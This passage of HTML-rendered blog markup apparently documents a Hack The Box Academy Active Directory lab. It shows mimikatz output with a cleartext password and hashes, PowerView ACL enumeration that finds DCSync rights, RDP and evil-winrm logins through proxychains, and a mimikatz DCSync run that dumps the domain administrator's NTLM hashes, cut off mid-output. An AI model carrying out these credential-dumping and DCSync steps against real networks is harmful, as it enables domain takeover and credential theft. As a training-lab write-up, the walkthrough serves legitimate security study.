</span><span class="nx">6a</span><span class="w"> </span><span class="nx">29</span><span class="w"> </span><span class="nx">6f</span><span class="w"> </span><span class="nx">73</span><span class="w"> </span><span class="nx">43</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">ce</span><span class="w"> </span><span class="nx">0c</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">a1</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">70</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">2d</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">1d</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">66</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">1e</span><span class="w"> </span><span class="nx">05</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">4e</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="nx">d3</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">c1</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">5f</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">ad</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">d3</span><span class="w"> </span><span class="nx">df</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">77</span><span class="w"> </span><span class="nx">c1</span><span class="w"> </span><span class="nx">5b</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">76</span><span class="w"> </span><span class="nx">ae</span><span class="w"> </span><span class="nx">4a</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">bf</span><span class="w"> </span><span class="nx">ec</span><span class="w"> </span><span class="nx">b3</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="nx">9b</span><span class="w"> </span><span class="nx">8f</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">73</span><span class="w"> </span><span class="nx">c7</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">00</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">dd</span><span class="w"> </span><span class="nx">d7</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">3b</span><span class="w"> </span><span class="nx">83</span><span class="w"> </span><span class="nx">5a</span><span class="w"> </span><span class="nx">0f</span><span class="w"> </span><span class="nx">35</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">f7</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">2c</span><span class="w"> </span><span class="nx">e8</span><span class="w"> </span><span class="nx">7c</span><span class="w"> </span><span class="nx">0b</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">c3</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="nx">10</span><span class="w"> </span><span class="nx">a6</span><span class="w"> </span><span class="nx">86</span><span class="w"> </span><span class="nx">c4</span><span class="w"> </span><span class="nx">75</span><span class="w"> </span><span class="nx">0a</span><span class="w"> </span><span class="nx">10</span><span class="w"> </span><span class="nx">71</span><span class="w"> </span><span class="nx">50</span><span class="w"> </span><span class="nx">fb</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">78</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">21</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">58</span><span class="w"> </span><span class="nx">b9</span><span class="w"> </span><span class="nx">71</span><span class="w"> </span><span class="nx">ba</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">67</span><span class="w"> </span><span class="nx">fc</span><span class="w"> </span><span class="nx">03</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">a2</span><span class="w"> </span><span class="nx">e5</span><span class="w"> </span><span class="nx">c5</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">c4</span><span class="w"> </span><span class="nx">98</span><span class="w"> </span><span class="nx">da</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">5c</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">94</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">25</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">e8</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">9f</span><span class="w"> </span><span class="nx">04</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">65</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">e7</span><span class="w"> </span><span class="nx">69</span><span class="w"> </span><span class="nx">17</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">b4</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">24</span><span class="w"> </span><span class="nx">e2</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">99</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="n">ssp</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">credman</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">Authentication</span><span class="w"> </span><span class="nx">Id</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="mi">170825</span><span class="w"> </span><span class="p">(</span><span class="mi">00000000</span><span class="p">:</span><span class="mi">00029</span><span class="n">b49</span><span class="p">)</span><span class="w"> </span><span class="n">Session</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Interactive</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">tpetty</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Server</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DC01</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Time</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">9:40:40</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">SID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-4607</span><span class="w"> </span><span class="n">msv</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="mi">00000003</span><span class="p">]</span><span class="w"> </span><span class="n">Primary</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">tpetty</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">fd37b6fec5704cadabb319cebf9e3a3a</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">SHA1</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">38afea42a5e28220474839558f073979645a1192</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">DPAPI</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">da2ec07551ab1602b7468db08b41e3b2</span><span class="w"> </span><span class="n">tspkg</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">wdigest</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">tpetty</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Sup3rS3cur3D0m</span><span class="err">@</span><span class="nx">inU2eR</span><span class="w"> </span><span class="n">kerberos</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">tpetty</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">ssp</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">credman</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># exit</span><span class="w"> </span><span class="n">Bye</span><span class="o">!</span><span class="w"> </span></code></pre> </div> <p>Now we got back plain text password:Sup3rS3cur3D0m@inU2eR for:tpetty</p> <p>Let's check what the user can do:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\tpetty</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Import-Module</span><span class="w"> </span><span class="o">.</span><span class="nx">\PowerView.ps1</span><span class="w"> </span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\tpetty</span><span class="err">&gt;</span><span class="w"> </span><span class="nv">$sid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Convert-NameToSid</span><span class="w"> </span><span class="nx">tpetty</span><span class="w"> </span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\tpetty</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-DomainObjectACL</span><span class="w"> </span><span class="nt">-Identity</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="nf">?</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">SecurityIdentifier</span><span class="w"> </span><span class="o">-eq</span><span class="w"> </span><span class="nv">$sid</span><span class="p">}</span><span class="w"> </span><span class="n">ObjectDN</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DC</span><span class="o">=</span><span class="n">INLANEFREIGHT</span><span class="p">,</span><span class="nx">DC</span><span class="o">=</span><span class="n">LOCAL</span><span class="w"> </span><span class="nx">ObjectSID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398</span><span class="w"> </span><span class="n">ActiveDirectoryRights</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ExtendedRight</span><span class="w"> </span><span class="n">ObjectAceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ObjectAceTypePresent</span><span class="w"> </span><span class="n">ObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">89e95b76-444d-4c62-991a-0facbeda640c</span><span class="w"> </span><span class="n">InheritedObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">00000000-0000-0000-0000-000000000000</span><span class="w"> </span><span class="n">BinaryLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="n">AceQualifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowed</span><span class="w"> </span><span class="n">IsCallback</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">OpaqueLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="n">AccessMask</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">256</span><span class="w"> </span><span class="n">SecurityIdentifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-4607</span><span class="w"> </span><span class="n">AceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowedObject</span><span class="w"> </span><span class="n">AceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">IsInherited</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">InheritanceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">PropagationFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">AuditFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">ObjectDN</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DC</span><span class="o">=</span><span class="n">INLANEFREIGHT</span><span class="p">,</span><span class="nx">DC</span><span class="o">=</span><span class="n">LOCAL</span><span class="w"> </span><span class="nx">ObjectSID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398</span><span class="w"> </span><span class="n">ActiveDirectoryRights</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ExtendedRight</span><span class="w"> </span><span class="n">ObjectAceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ObjectAceTypePresent</span><span class="w"> </span><span class="n">ObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">1131f6aa-9c07-11d1-f79f-00c04fc2dcd2</span><span class="w"> </span><span class="n">InheritedObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">00000000-0000-0000-0000-000000000000</span><span class="w"> </span><span class="n">BinaryLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="n">AceQualifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowed</span><span class="w"> </span><span class="n">IsCallback</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">OpaqueLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="n">AccessMask</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">256</span><span class="w"> </span><span class="n">SecurityIdentifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-4607</span><span class="w"> </span><span class="n">AceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowedObject</span><span class="w"> </span><span class="n">AceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">IsInherited</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">InheritanceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">PropagationFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">AuditFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">ObjectDN</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DC</span><span class="o">=</span><span class="n">INLANEFREIGHT</span><span class="p">,</span><span class="nx">DC</span><span class="o">=</span><span class="n">LOCAL</span><span class="w"> </span><span class="nx">ObjectSID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398</span><span class="w"> </span><span class="n">ActiveDirectoryRights</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ExtendedRight</span><span class="w"> </span><span class="n">ObjectAceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">ObjectAceTypePresent</span><span class="w"> </span><span class="n">ObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">1131f6ad-9c07-11d1-f79f-00c04fc2dcd2</span><span class="w"> </span><span class="n">InheritedObjectAceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">00000000-0000-0000-0000-000000000000</span><span class="w"> </span><span class="n">BinaryLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">56</span><span class="w"> </span><span class="n">AceQualifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowed</span><span class="w"> </span><span class="n">IsCallback</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">OpaqueLength</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="n">AccessMask</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">256</span><span class="w"> </span><span class="n">SecurityIdentifier</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-4607</span><span class="w"> </span><span class="n">AceType</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">AccessAllowedObject</span><span class="w"> </span><span class="n">AceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">IsInherited</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">False</span><span class="w"> </span><span class="n">InheritanceFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">PropagationFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span><span class="n">AuditFlags</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">None</span><span class="w"> </span></code></pre> </div> <p>We notice the GUIDs below after checking them online which can lead to DCSync attack:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 89e95b76-444d-4c62-991a-0facbeda640c Replicating Directory Changes + Replicating Directory Changes All <span class="o">(</span>with ExtendedRight on the domain object<span class="o">)</span> </code></pre> </div> <p>I connect to the host via RDP:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>proxychains xfreerdp /v:172.16.6.50 /u:svc_sql /p:lucky7 /size:600x550[proxychains] config file found: /etc/proxychains.conf <span class="o">[</span>proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 <span class="o">[</span>proxychains] DLL init: proxychains-ng 4.16 <span class="o">[</span>proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:3389 ... OK </code></pre> </div> <p>Then I ran <code>runas /user:INLANEFREIGHT\tpetty powershell.exe</code> to run as tpetty, this open another powershell running as tpetty</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Formecztzbc2ceui90rfn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Formecztzbc2ceui90rfn.png" alt="shell" width="719" height="563"></a></p> <p>To futher enumerate I need mimikatz on the host, so I decided to connect the host via evil-winrm to make it easy to upload scripts. I uploaded mimikatz via evil-winrm in the tpetty DIR for easy access<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>proxychains evil-winrm <span class="nt">-i</span> 172.16.6.50 <span class="nt">-u</span> svc_sql <span class="nt">-p</span> lucky7 <span class="o">[</span>proxychains] config file found: /etc/proxychains.conf <span class="o">[</span>proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 <span class="o">[</span>proxychains] DLL init: proxychains-ng 4.16 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function </span>is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint <span class="o">[</span>proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\s</span>vc_sql.INLANEFREIGHT<span class="se">\D</span>ocuments&gt; <span class="nb">cd </span>C:<span class="se">\</span> <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\&gt;</span> <span class="nb">cd </span>Users <span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers&gt; <span class="nb">cd </span>tpetty </code></pre> </div> <p>Then I run mimikatz on the powershell running as tpetty<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Users\tpetty</span><span class="err">&gt;</span><span class="w"> </span><span class="o">.</span><span class="nx">\mimikatz.exe</span><span class="w"> </span><span class="o">.</span><span class="c">#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36</span><span class="w"> </span><span class="o">.</span><span class="c">## ^ ##. "A La Vie, A L'Amour" - (oe.eo)</span><span class="w"> </span><span class="c">## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><span class="w"> </span><span class="c">## \ / ## &gt; http://blog.gentilkiwi.com/mimikatz</span><span class="w"> </span><span class="s1">'## v ##'</span><span class="w"> </span><span class="n">Vincent</span><span class="w"> </span><span class="nx">LE</span><span class="w"> </span><span class="nx">TOUX</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="n">vincent.letoux</span><span class="err">@</span><span class="nx">gmail.com</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="s1">'#####'</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="n">http://pingcastle.com</span><span class="w"> </span><span class="nx">/</span><span class="w"> </span><span class="nx">http://mysmartlogon.com</span><span class="w"> </span><span class="o">***</span><span class="nx">/</span><span class="w"> </span><span class="n">mimikatz</span><span class="w"> </span><span class="c"># </span><span class="w"> </span></code></pre> </div> <p>Once mimikatz is running, you should see <code>mimikatz #</code> then run <code>privilege::debug</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="w"> </span><span class="n">mimikatz</span><span class="w"> </span><span class="c"># privilege::debug</span><span class="w"> </span><span class="n">ERROR</span><span class="w"> </span><span class="nx">kuhl_m_privilege_simple</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="n">RtlAdjustPrivilege</span><span class="w"> </span><span class="p">(</span><span class="mi">20</span><span class="p">)</span><span class="w"> </span><span class="n">c0000061</span><span class="w"> </span></code></pre> </div> <p>The run <code>lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator</code> to get <code>domain Admin hash</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">mimikatz</span><span class="w"> </span><span class="c"># lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator</span><span class="w"> </span><span class="p">[</span><span class="n">DC</span><span class="p">]</span><span class="w"> </span><span class="s1">'INLANEFREIGHT.LOCAL'</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">domain</span><span class="w"> </span><span class="p">[</span><span class="n">DC</span><span class="p">]</span><span class="w"> </span><span class="s1">'DC01.INLANEFREIGHT.LOCAL'</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">DC</span><span class="w"> </span><span class="nx">server</span><span class="w"> </span><span class="p">[</span><span class="n">DC</span><span class="p">]</span><span class="w"> </span><span class="s1">'INLANEFREIGHT\administrator'</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="nx">account</span><span class="w"> </span><span class="n">Object</span><span class="w"> </span><span class="nx">RDN</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Administrator</span><span class="w"> </span><span class="o">**</span><span class="w"> </span><span class="n">SAM</span><span class="w"> </span><span class="nx">ACCOUNT</span><span class="w"> </span><span class="o">**</span><span class="w"> </span><span class="n">SAM</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Administrator</span><span class="w"> </span><span class="n">Account</span><span class="w"> </span><span class="nx">Type</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">30000000</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="n">USER_OBJECT</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Account</span><span class="w"> </span><span class="nx">Control</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">00000200</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="n">NORMAL_ACCOUNT</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="n">Account</span><span class="w"> </span><span class="nx">expiration</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="nx">last</span><span class="w"> </span><span class="nx">change</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">4/11/2022</span><span class="w"> </span><span class="nx">9:24:49</span><span class="w"> </span><span class="nx">PM</span><span class="w"> </span><span class="n">Object</span><span class="w"> </span><span class="nx">Security</span><span class="w"> </span><span class="nx">ID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-21-2270287766-1317258649-2146029398-500</span><span class="w"> </span><span class="n">Object</span><span class="w"> </span><span class="nx">Relative</span><span class="w"> </span><span class="nx">ID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">500</span><span class="w"> </span><span class="n">Credentials:</span><span class="w"> </span><span class="nx">Hash</span><span class="w"> </span><span class="nx">NTLM:</span><span class="w"> </span><span class="nx">27dedb1dab4d8545c6e1c66fba077da0</span><span class="w"> </span><span class="n">ntlm-</span><span class="w"> </span><span class="nx">0:</span><span class="w"> </span><span class="nx">27dedb1dab4d8545c6e1c66fba077da0</span><span class="w"> </span><span class="n">ntlm-</span><span class="w"> </span><span class="nx">1:</span><span class="w"> </span><span class="nx">bdaffbfe64f1fc646a3353be1c2c3c99</span><span class="w"> </span><span class="n">lm</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">0:</span><span class="w"> </span><span class="nx">757743529af55e110994f3c7e3710fc9</span><span class="w"> </span><span class="n">Supplemental</span><span class="w"> </span><span class="nx">Credentials:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Primary:NTLM-Strong-NTOWF</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Random</span><span class="w"> </span><span class="nx">Value</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">b8bcb44123b3cc3bff20c663f1e0b94d</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span 